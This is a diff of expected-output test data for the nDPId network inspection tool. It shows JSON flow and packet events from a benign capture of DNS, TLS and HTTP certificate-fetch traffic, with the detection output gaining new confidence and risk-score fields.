 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIwDAAAEAR6EPAqAF5CAgICNkaADUANI8rXZMBAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAE="}
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJH8AAEARg\/XAqAF5CAgICNUhADUANLCIQG8BAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAE="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-01380{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+01406{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}}
 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1626168077619,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"ts_msec":1626168077619,"pkt":"8BiYFWV8WNVuaKQACABFAACITIkAAHkRIqsICAgIwKgBeQA12RoAdB3yXZOBgAABAAAAAQAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAHAEwAGAAEAAAKpADQGbjBkc2NiwBgKaG9zdG1hc3RlcgZha2FtYWkDY29tAGDtWc8AAAPoAAAD6AAAA+gAAAcI"}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"}
 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1626168077622,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"ts_msec":1626168077622,"pkt":"8BiYFWV8WNVuaKQACABFAADmBoMAAHgRaVMICAgIwKgBeQA14zEA0sNDCy+BgAABAAQAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAosACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAyUANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAMDABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKEAAQABAAAAEwAEAhYh6w=="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"}
-00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}}
+00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1626168077633,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1626168077633,"pkt":"8BiYFWV8WNVuaKQACABFAABYGXsAAHgRVukICAgIwKgBeQA11SEAREvAQG+BgAABAAEAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAHADAABAAEAAAATAAQCFiHr"}
-00774{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}}
-00891{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}}
+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"}
-00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}}
-00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}}
+00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"}
